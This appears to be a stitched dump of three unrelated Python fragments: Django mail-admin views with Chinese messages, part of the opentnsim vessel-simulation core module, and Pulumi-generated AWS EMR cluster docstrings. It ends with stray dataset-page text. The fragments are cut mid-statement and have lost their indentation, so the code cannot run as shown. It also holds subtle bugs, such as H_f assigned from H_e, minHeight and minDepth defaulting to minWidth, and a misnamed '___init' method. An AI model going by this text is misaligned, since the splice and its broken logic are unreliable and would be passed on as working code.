obj = CoreWhitelist.objects.create(type="fix_{}".format(type), domain_id=domain_id, mailbox_id=mailbox_id, email=mailbox)
obj.save()
def saveOldEmail():
for mailbox, data in mailboxDict.items():
data = mailboxDict[mailbox]
entry_id = data.get("id", "")
if not entry_id:
continue
obj = CoreWhitelist.objects.filter(id=entry_id).first()
if not obj:
continue
if data.get("delete", u"-1") == u"1":
obj.delete()
else:
obj.disabled = data.get("disabled", "-1")
obj.save()
def saveWhitelist():
#先添加新的邮箱
if newMailbox:
saveNewEmail( newMailbox )
for mailbox in newMailboxList:
saveNewEmail( mailbox )
saveOldEmail()
#enddef
domain_id = get_domainid_bysession(request)
mailboxDict = {}
newMailboxList = []
data = request.POST
if not data:
return
type = data.get("type", u"send")
mailbox_id = data.get("id", 0)
newMailbox = data.get("new_mailbox", u"")
newMailboxList = data.get("new_mailbox_list", u"")
if newMailbox:
newMailbox = newMailbox
boxList = newMailboxList.split("|")
boxList = [box for box in boxList if box.strip()]
if boxList:
newMailboxList = boxList
for k,v in data.items():
if k.startswith("{}_".format(type)):
if k.endswith("_id"):
mailbox = getPostMailbox(k)
setPostMailboxData(mailbox, "id", v)
elif k.endswith("_delete"):
mailbox = getPostMailbox(k)
setPostMailboxData(mailbox, "delete", v)
for mailbox in mailboxDict.keys():
isDisabled = data.get(u"{}_{}_disabled".format(type, mailbox), u"1")
setPostMailboxData(mailbox, "disabled", isDisabled)
data = {
"status" : "OK",
"message" : "Success",
}
if request.method == 'POST':
saveWhitelist()
return HttpResponse(json.dumps(data), content_type="application/json")
@licence_required
def ajax_edit_account(request):
domain_id = get_domainid_bysession(request)
data = request.POST
id = data.get('id', '')
mailbox_id = data.get('mailbox_id', '')
action = data.get('action', '').strip()
group_id = data.get('group_id', '').strip()
if not mailbox_id:
raise Http404
if action == 'del_group':
CoreGroupMember.objects.filter(id=id, mailbox_id=mailbox_id).delete()
res = {'msg': _(u'删除成功').encode('utf-8')}
elif action == 'add_group':
if CoreGroupMember.objects.filter(mailbox_id=mailbox_id):
msg = _(u'邮箱已存在于其他组')
res = {'msg': msg.encode('utf-8'),
'result': False, 'group_id': 0, 'group_name': ''}
else:
obj, _b = CoreGroupMember.objects.get_or_create(group_id=group_id, mailbox_id=mailbox_id)
msg = _(u'添加成功') if _b else _(u'重复添加')
res = {'msg': msg.encode('utf-8'),
'result': _b, 'group_id': obj.id, 'group_name': obj.group.name}
elif action == 'del_dept':
DepartmentMember.objects.filter(id=id, mailbox_id=mailbox_id).delete()
res = {'msg': _(u'删除成功').encode('utf-8')}
elif action == 'add_dept':
dept_id = data.get('dept_id', '').strip()
postion = data.get('position', '').strip()
obj, _b = DepartmentMember.objects.get_or_create(domain_id=domain_id, dept_id=dept_id, mailbox_id=mailbox_id)
if _b:
msg = _(u'添加成功')
obj.position = postion
obj.save()
else:
msg = _(u'重复添加')
res = {'msg': msg.encode('utf-8'),
'result': _b, 'dept_id': obj.id, 'dept_name': obj.dept.title, 'position': obj.position}
elif action == 'edit_dept':
postion = data.get('position', '').strip()
obj = DepartmentMember.objects.filter(id=id, mailbox_id=mailbox_id).first()
if obj:
obj.position = postion
obj.save()
res = {'msg': _(u'修改成功').encode('utf-8')}
elif action == 'del_maillist':
ExtListMember.objects.filter(id=id, address=Mailbox.objects.get(id=mailbox_id).username).delete()
res = {'msg': _(u'删除成功').encode('utf-8')}
elif action == 'add_maillist':
maillist_id = data.get('maillist_id', '')
permit = data.get('permit', '')
mailbox_obj = Mailbox.objects.get(id=mailbox_id)
objs = ExtListMember.objects.filter(domain_id=domain_id, extlist_id=maillist_id, address=mailbox_obj.username)
if objs:
obj = objs[0]
_b = False
msg = _(u'重复添加')
else:
_b = True
obj = ExtListMember.objects.create(domain_id=domain_id, extlist_id=maillist_id,
address=mailbox_obj.username,
name=mailbox_obj.mailboxuser.realname, permit=permit, update_time=time.time())
msg = _(u'添加成功')
res = {'msg': msg.encode('utf-8'),
'result': _b, 'maillist_id': obj.id, 'maillist_name': obj.extlist.listname,
'maillist_address': obj.extlist.address}
elif action == 'del_relate_email':
WmRelateEmail.objects.filter(id=id, mailbox_id=mailbox_id).delete()
res = {'msg': _(u'删除成功').encode('utf-8')}
elif action == 'add_relate_email':
relate_name = data.get('relate_name', '')
relate_domain = data.get('relate_domain', '')
target_objs = Mailbox.objects.filter(domain_id=relate_domain, name=relate_name)
if target_objs:
target_obj = target_objs[0]
obj, _b = WmRelateEmail.objects.get_or_create(mailbox_id=mailbox_id, target=target_obj, domain_id=domain_id)
if _b:
msg = _(u'添加成功')
else:
msg = _(u'重复添加')
res = {'msg': msg.encode('utf-8'),
'result': _b, 'relate_id': obj.id, 'relate_name': obj.target.username,
'relate_domain': obj.domain.domain, 'access': obj.get_access_display()}
else:
msg = _(u'邮箱不存在')
res = {'msg': msg.encode('utf-8')}
elif action == 'edit':
data = data.copy()
domain_id = get_domainid_bysession(request)
domain = Domain.objects.get(id=domain_id)
obj = Mailbox.objects.get(id=mailbox_id)
disabled_origin = obj.disabled
user = obj.mailboxuser
disabled = data.get('disabled', '')
data['disabled'] = '-1' if disabled == 'on' else '1'
change_pwd = data.get('change_pwd', '')
data['change_pwd'] = '1' if change_pwd == 'on' else '-1'
enable_share = data.get('enable_share', '')
data['enable_share'] = 1 if enable_share == 'on' else -1
oabshow = data.get('oabshow', '')
data['oabshow'] = '1' if oabshow == 'on' else '-1'
mailbox_size_using = obj.quota_mailbox
netdisk_size_using = obj.quota_netdisk
form = MailboxForm(domain, data, instance=obj)
user_form = MailboxUserForm(domain, data, instance=user)
result = True
if form.is_valid() and user_form.is_valid():
checker = MailboxLimitChecker()
mailbox_size = form.cleaned_data.get('quota_mailbox')
netdisk_size = form.cleaned_data.get('quota_netdisk')
if form.cleaned_data['disabled'] == '-1' and disabled_origin == '1':
check_count = 1
else:
check_count = 0
try:
checker.simple_check(domain_id, mailbox_size, netdisk_size, mailbox_size_using, netdisk_size_using, check_count)
except Exception, e:
msg = u'{}{}'.format(_(u'修改失败。'), e.message)
result = False
else:
obj = form.save()
user_form.save(obj.id)
msg = _(u'邮箱(%s)修改成功') % obj.username
else:
result = False
msg = u'{} {}'.format(form.errors, user_form.errors)
res = {'msg': msg.encode('utf-8'), 'result': result}
if is_distribute_open():
task_queue = TaskQueue()
proxy_data = {
'protocol': 'core_mailbox',
'data': {'update': mailbox_id}
}
task_queue.add_task_to_queue('proxy_web_command', proxy_data)
task_queue.create_trigger('proxy')
return HttpResponse(json.dumps(res), content_type="application/json")
@licence_required
def reply(request, id, template_name='mailbox/reply.html'):
mailbox_obj = Mailbox.objects.get(id=id)
reply_list = ExtReply.objects.filter(mailbox=mailbox_obj)
return render(request, template_name=template_name, context={
'mailbox_id': mailbox_obj.id,
'mailbox_obj': mailbox_obj,
'lists': reply_list,
'day_dict': DAY_DICT
})
@licence_required
def add_reply(request, id, template_name='mailbox/add_reply.html'):
obj = Mailbox.objects.get(id=id)
return render(request, template_name=template_name, context={
'mailbox_obj': obj,
'mailbox_id': obj.id,
})
@licence_required
def edit_reply(request, id, template_name='mailbox/edit_reply.html'):
obj = ExtReply.objects.get(id=id)
mailbox_obj = obj.mailbox
rule_obj = obj.rule
conditions = rule_obj.rule_condition.all()
con_lists = ['sender', 'sender_original', 'recipient', 'recipient_original', 'copy_addr', 'subject']
con = []
for f in con_lists:
_con = {'option': f, 'name': | |
<filename>opentnsim/core.py
"""Main module."""
# package(s) related to time, space and id
import json
import logging
import uuid
# you need these dependencies (you can get these from anaconda)
# package(s) related to the simulation
import simpy
import random
import networkx as nx
import numpy as np
import math
import pandas as pd
# spatial libraries
import pyproj
import shapely.geometry
# additional packages
import datetime, time
logger = logging.getLogger(__name__)
class SimpyObject:
"""General object which can be extended by any class requiring a simpy environment
env: a simpy Environment
"""
def __init__(self, env, *args, **kwargs):
super().__init__(*args, **kwargs)
self.env = env
class HasResource(SimpyObject):
"""Something that has a resource limitation, a resource request must be granted before the object can be used.
nr_resources: nr of requests that can be handled simultaneously"""
def __init__(self, nr_resources=1, priority=False, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.resource = (
simpy.PriorityResource(self.env, capacity=nr_resources)
if priority
else simpy.Resource(self.env, capacity=nr_resources)
)
class Identifiable:
"""Mixin class: Something that has a name and id
name: a name
id: a unique id generated with uuid"""
def __init__(self, name, id=None, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.name = name
# generate some id, in this case based on m
self.id = id if id else str(uuid.uuid1())
class Locatable:
"""Mixin class: Something with a geometry (geojson format)
geometry: can be a point as well as a polygon"""
def __init__(self, geometry, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.geometry = geometry
self.node = None
class Neighbours:
"""Can be added to a locatable object (list)
travel_to: list of locatables to which can be travelled"""
def ___init(self, travel_to, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.neighbours = travel_to
class HasLength(SimpyObject):
"""Mixin class: Something with a storage capacity
capacity: amount the container can hold
level: amount the container holds initially
total_requested: a counter that helps to prevent over requesting"""
def __init__(self, length, remaining_length=0, total_requested=0, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.length = simpy.Container(self.env, capacity = length, init=remaining_length)
self.pos_length = simpy.Container(self.env, capacity = length, init=remaining_length)
class HasContainer(SimpyObject):
"""Mixin class: Something with a storage capacity
capacity: amount the container can hold
level: amount the container holds initially
container: a simpy object that can hold stuff
total_requested: a counter that helps to prevent over requesting"""
def __init__(self, capacity, level=0, total_requested=0, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.container = simpy.Container(self.env, capacity, init=level)
self.total_requested = total_requested
@property
def is_loaded(self):
return True if self.container.level > 0 else False
@property
def filling_degree(self):
return self.container.level / self.container.capacity
class Log(SimpyObject):
"""Mixin class: Something that has logging capability
log: log message [format: 'start activity' or 'stop activity']
t: timestamp
value: a value can be logged as well
geometry: value from locatable (lat, lon)"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
"""Initialization"""
self.log = {"Message": [], "Timestamp": [], "Value": [], "Geometry": []}
def log_entry(self, log, t, value, geometry_log):
"""Log"""
self.log["Message"].append(log)
self.log["Timestamp"].append(datetime.datetime.fromtimestamp(t))
self.log["Value"].append(value)
self.log["Geometry"].append(geometry_log)
def get_log_as_json(self):
json = []
for msg, t, value, geometry_log in zip(
self.log["Message"],
self.log["Timestamp"],
self.log["Value"],
self.log["Geometry"],
):
json.append(
dict(message=msg, time=t, value=value, geometry_log=geometry_log)
)
return json
class VesselProperties:
"""Mixin class: Something that has vessel properties
This mixin is updated to better accommodate the ConsumesEnergy mixin
type: can contain info on vessel type (avv class, cemt_class or other)
B: vessel width
L: vessel length
H_e: vessel height unloaded
H_f: vessel height loaded
T_e: draught unloaded
T_f: draught loaded
Add information on possible restrictions to the vessels, i.e. height, width, etc.
"""
def __init__(
self,
type,
B,
L,
H_e,
H_f,
T_e,
T_f,
*args,
**kwargs
):
super().__init__(*args, **kwargs)
"""Initialization"""
self.type = type
self.B = B
self.L = L
self.H_e = H_e
self.H_f = H_e
self.T_e = T_e
self.T_f = T_f
@property
def H(self):
""" Calculate current height based on filling degree """
return (
self.filling_degree * (self.H_f - self.H_e)
+ self.H_e
)
@property
def T(self):
""" Calculate current draught based on filling degree
Here we should implement the rules from Van Dorsser et al
https://www.researchgate.net/publication/344340126_The_effect_of_low_water_on_loading_capacity_of_inland_ships
"""
return (
self.filling_degree * (self.T_f - self.T_e)
+ self.T_e
)
def get_route(
self,
origin,
destination,
graph=None,
minWidth=None,
minHeight=None,
minDepth=None,
randomSeed=4,
):
""" Calculate a path based on vessel restrictions """
graph = graph if graph else self.env.FG
minWidth = minWidth if minWidth else 1.1 * self.B
minHeight = minWidth if minHeight else 1.1 * self.H
minDepth = minWidth if minDepth else 1.1 * self.T
# Check if information on restrictions is added to the edges
random.seed(randomSeed)
edge = random.choice(list(graph.edges(data=True)))
edge_attrs = list(edge[2].keys())
# IMPROVE THIS TO CHECK ALL EDGES AND COMBINATIONS OF RESTRICTIONS
if all(item in edge_attrs for item in ["Width", "Height", "Depth"]):
edges = []
nodes = []
for edge in graph.edges(data=True):
if (
edge[2]["Width"] >= minWidth
and edge[2]["Height"] >= minHeight
and edge[2]["Depth"] >= minDepth
):
edges.append(edge)
nodes.append(graph.nodes[edge[0]])
nodes.append(graph.nodes[edge[1]])
subGraph = graph.__class__()
for node in nodes:
subGraph.add_node(
node["name"],
name=node["name"],
geometry=node["geometry"],
position=(node["geometry"].x, node["geometry"].y),
)
for edge in edges:
subGraph.add_edge(edge[0], edge[1], attr_dict=edge[2])
try:
return nx.dijkstra_path(subGraph, origin, destination)
# return nx.bidirectional_dijkstra(subGraph, origin, destination)
except:
raise ValueError(
"No path was found with the given boundary conditions."
)
# If not, return shortest path
else:
return nx.dijkstra_path(graph, origin, destination)
class ConsumesEnergy:
"""Mixin class: Something that consumes energy.
P_installed: installed engine power [kW]
L_w: weight class of the ship (depending on carrying capacity) (classes: L1 (=1), L2 (=2), L3 (=3))
C_b: block coefficient ('fullness') [-]
nu: kinematic viscosity [m^2/s]
rho: density of the surrounding water [kg/m^3]
g: gravitational accelleration [m/s^2]
x: number of propellors [-]
eta_0: open water efficiency of propellor [-]
eta_r: relative rotative efficiency [-]
eta_t: transmission efficiency [-]
eta_g: gearing efficiency [-]
c_stern: determines shape of the afterbody [-]
one_k2: appendage resistance factor [-]
c_year: construction year of the engine [y]
"""
def __init__(
self,
P_installed,
L_w,
C_b,
nu=1 * 10 ** (-6), # kinematic viscosity
rho=1000,
g=9.81,
x=2, # number of propellors
eta_0=0.6,
eta_r=1.00,
eta_t=0.98,
eta_g=0.96,
c_stern=0,
one_k2=2.5,
*args,
**kwargs
):
super().__init__(*args, **kwargs)
"""Initialization"""
self.P_installed = P_installed
self.L_w = L_w
self.C_b = C_b
self.nu = nu
self.rho = rho
self.g = g
self.x = x
self.eta_0 = eta_0
self.eta_r = eta_r
self.eta_t = eta_t
self.eta_g = eta_g
self.c_stern = c_stern
self.one_k2 = one_k2
self.c_year = self.calculate_engine_age() # The construction year of the engine is now generated once, instead of for each time step
# The engine age and construction year of the engine is computed with the function below.
# The construction year of the engine is used in the emission functions (1) emission_factors_general and (2) correction_factors
def calculate_engine_age(self):
"""Calculating the construction year of the engine, dependend on a Weibull function with
shape factor 'k', and scale factor 'lmb', which are determined by the weight class L_w"""
# Determining which shape and scale factor to use, based on the weight class L_w = L1, L2 or L3
if self.L_w == 1: # Weight class L1
self.k = 1.3
self.lmb = 20.5
if self.L_w == 2: # Weight class L2
self.k = 1.12
self.lmb = 18.5
if self.L_w == 3: # Weight class L3
self.k = 1.26
self.lmb = 18.6
# The age of the engine
self.age = int(np.random.weibull(self.k) * self.lmb)
# Current year (TO DO: fix hardcoded year)
# self.year = datetime.date.year
self.year = 2021
# Construction year of the engine
self.c_year = self.year - self.age
print('The construction year of the engine is', self.c_year)
return self.c_year
def calculate_properties(self):
"""Calculate a number of basic vessel properties"""
self.C_M = 1.006 - 0.0056 * self.C_b ** (-3.56) # Midship section coefficient
self.C_wp = (1 + 2 * self.C_b) / 3 # Waterplane coefficient
self.C_p = self.C_b / self.C_M # Prismatic coefficient
self.delta = self.C_b * self.L * self.B * self.T # Water displacement
self.lcb = -13.5 + 19.4 * self.C_p # longitudinal center of buoyancy
self.L_R = self.L * (1 - self.C_p + (0.06 * self.C_p * self.lcb) / (
4 * self.C_p - 1)) # parameter reflecting the length of the run
self.A_T = 0.2 * self.B * self.T # transverse area of the transom
# Total wet area
self.S_T = self.L * (2 * self.T + self.B) * np.sqrt(self.C_M) * (
0.453 + 0.4425 * self.C_b - 0.2862 * self.C_M - 0.003467 * (
self.B / self.T) + | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Cluster(pulumi.CustomResource):
additional_info: pulumi.Output[str]
"""
A JSON string for selecting additional features such as adding proxy information. Note: Currently there is no API to retrieve the value of this argument after EMR cluster creation from provider, therefore this provider cannot detect drift from the actual EMR cluster if its value is changed outside this provider.
"""
applications: pulumi.Output[list]
"""
A list of applications for the cluster. Valid values are: `Flink`, `Hadoop`, `Hive`, `Mahout`, `Pig`, `Spark`, and `JupyterHub` (as of EMR 5.14.0). Case insensitive
"""
arn: pulumi.Output[str]
autoscaling_role: pulumi.Output[str]
"""
An IAM role for automatic scaling policies. The IAM role provides permissions that the automatic scaling feature requires to launch and terminate EC2 instances in an instance group.
"""
bootstrap_actions: pulumi.Output[list]
"""
Ordered list of bootstrap actions that will be run before Hadoop is started on the cluster nodes. Defined below.
* `args` (`list`) - List of command line arguments passed to the JAR file's main function when executed.
* `name` (`str`) - The name of the step.
* `path` (`str`) - Location of the script to run during a bootstrap action. Can be either a location in Amazon S3 or on a local file system
"""
cluster_state: pulumi.Output[str]
configurations: pulumi.Output[str]
"""
List of configurations supplied for the EMR cluster you are creating
"""
configurations_json: pulumi.Output[str]
"""
A JSON string for supplying list of configurations for the EMR cluster.
"""
core_instance_count: pulumi.Output[float]
"""
Use the `core_instance_group` configuration block `instance_count` argument instead. Number of Amazon EC2 instances used to execute the job flow. EMR will use one node as the cluster's master node and use the remainder of the nodes (`core_instance_count`-1) as core nodes. Cannot be specified if `core_instance_group` or `instance_group` configuration blocks are set. Default `1`
"""
core_instance_group: pulumi.Output[dict]
"""
Configuration block to use an [Instance Group](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-instance-group-configuration.html#emr-plan-instance-groups) for the [core node type](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-master-core-task-nodes.html#emr-plan-core). Cannot be specified if `core_instance_count` argument, `core_instance_type` argument, or `instance_group` configuration blocks are set. Detailed below.
* `autoscaling_policy` (`str`) - The autoscaling policy document. This is a JSON formatted string. See [EMR Auto Scaling](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-automatic-scaling.html)
* `bid_price` (`str`) - Bid price for each EC2 instance in the instance group, expressed in USD. By setting this attribute, the instance group is being declared as a Spot Instance, and will implicitly create a Spot request. Leave this blank to use On-Demand Instances.
* `ebs_configs` (`list`) - Configuration block(s) for EBS volumes attached to each instance in the instance group. Detailed below.
* `iops` (`float`) - The number of I/O operations per second (IOPS) that the volume supports
* `size` (`float`) - The volume size, in gibibytes (GiB).
* `type` (`str`) - The volume type. Valid options are `gp2`, `io1`, `standard` and `st1`. See [EBS Volume Types](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html).
* `volumesPerInstance` (`float`) - The number of EBS volumes with this configuration to attach to each EC2 instance in the instance group (default is 1)
* `id` (`str`) - The ID of the EMR Cluster
* `instance_count` (`float`) - Target number of instances for the instance group. Must be 1 or 3. Defaults to 1. Launching with multiple master nodes is only supported in EMR version 5.23.0+, and requires this resource's `core_instance_group` to be configured. Public (Internet accessible) instances must be created in VPC subnets that have `map public IP on launch` enabled. Termination protection is automatically enabled when launched with multiple master nodes and this provider must have the `termination_protection = false` configuration applied before destroying this resource.
* `instance_type` (`str`) - EC2 instance type for all instances in the instance group.
* `name` (`str`) - The name of the step.
"""
core_instance_type: pulumi.Output[str]
"""
Use the `core_instance_group` configuration block `instance_type` argument instead. The EC2 instance type of the slave nodes. Cannot be specified if `core_instance_group` or `instance_group` configuration blocks are set.
"""
custom_ami_id: pulumi.Output[str]
"""
A custom Amazon Linux AMI for the cluster (instead of an EMR-owned AMI). Available in Amazon EMR version 5.7.0 and later.
"""
ebs_root_volume_size: pulumi.Output[float]
"""
Size in GiB of the EBS root device volume of the Linux AMI that is used for each EC2 instance. Available in Amazon EMR version 4.x and later.
"""
ec2_attributes: pulumi.Output[dict]
"""
Attributes for the EC2 instances running the job flow. Defined below
* `additionalMasterSecurityGroups` (`str`) - String containing a comma separated list of additional Amazon EC2 security group IDs for the master node
* `additionalSlaveSecurityGroups` (`str`) - String containing a comma separated list of additional Amazon EC2 security group IDs for the slave nodes as a comma separated string
* `emrManagedMasterSecurityGroup` (`str`) - Identifier of the Amazon EC2 EMR-Managed security group for the master node
* `emrManagedSlaveSecurityGroup` (`str`) - Identifier of the Amazon EC2 EMR-Managed security group for the slave nodes
* `instanceProfile` (`str`) - Instance Profile for EC2 instances of the cluster assume this role
* `key_name` (`str`) - Amazon EC2 key pair that can be used to ssh to the master node as the user called `<PASSWORD>`
* `serviceAccessSecurityGroup` (`str`) - Identifier of the Amazon EC2 service-access security group - required when the cluster runs on a private subnet
* `subnet_id` (`str`) - VPC subnet id where you want the job flow to launch. Cannot specify the `cc1.4xlarge` instance type for nodes of a job flow launched in a Amazon VPC
"""
instance_groups: pulumi.Output[list]
"""
Use the `master_instance_group` configuration block, `core_instance_group` configuration block and `emr.InstanceGroup` resource(s) instead. A list of `instance_group` objects for each instance group in the cluster. Exactly one of `master_instance_type` and `instance_group` must be specified. If `instance_group` is set, then it must contain a configuration block for at least the `MASTER` instance group type (as well as any additional instance groups). Cannot be specified if `master_instance_group` or `core_instance_group` configuration blocks are set. Defined below
* `autoscaling_policy` (`str`) - The autoscaling policy document. This is a JSON formatted string. See [EMR Auto Scaling](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-automatic-scaling.html)
* `bid_price` (`str`) - Bid price for each EC2 instance in the instance group, expressed in USD. By setting this attribute, the instance group is being declared as a Spot Instance, and will implicitly create a Spot request. Leave this blank to use On-Demand Instances.
* `ebs_configs` (`list`) - Configuration block(s) for EBS volumes attached to each instance in the instance group. Detailed below.
* `iops` (`float`) - The number of I/O operations per second (IOPS) that the volume supports
* `size` (`float`) - The volume size, in gibibytes (GiB).
* `type` (`str`) - The volume type. Valid options are `gp2`, `io1`, `standard` and `st1`. See [EBS Volume Types](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html).
* `volumesPerInstance` (`float`) - The number of EBS volumes with this configuration to attach to each EC2 instance in the instance group (default is 1)
* `id` (`str`) - The ID of the EMR Cluster
* `instance_count` (`float`) - Target number of instances for the instance group. Must be 1 or 3. Defaults to 1. Launching with multiple master nodes is only supported in EMR version 5.23.0+, and requires this resource's `core_instance_group` to be configured. Public (Internet accessible) instances must be created in VPC subnets that have `map public IP on launch` enabled. Termination protection is automatically enabled when launched with multiple master nodes and this provider must have the `termination_protection = false` configuration applied before destroying this resource.
* `instanceRole` (`str`) - The role of the instance group in the cluster. Valid values are: `MASTER`, `CORE`, and `TASK`.
* `instance_type` (`str`) - EC2 instance type for all instances in the instance group.
* `name` (`str`) - The name of the step.
"""
keep_job_flow_alive_when_no_steps: pulumi.Output[bool]
"""
Switch on/off run cluster with no steps or when |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.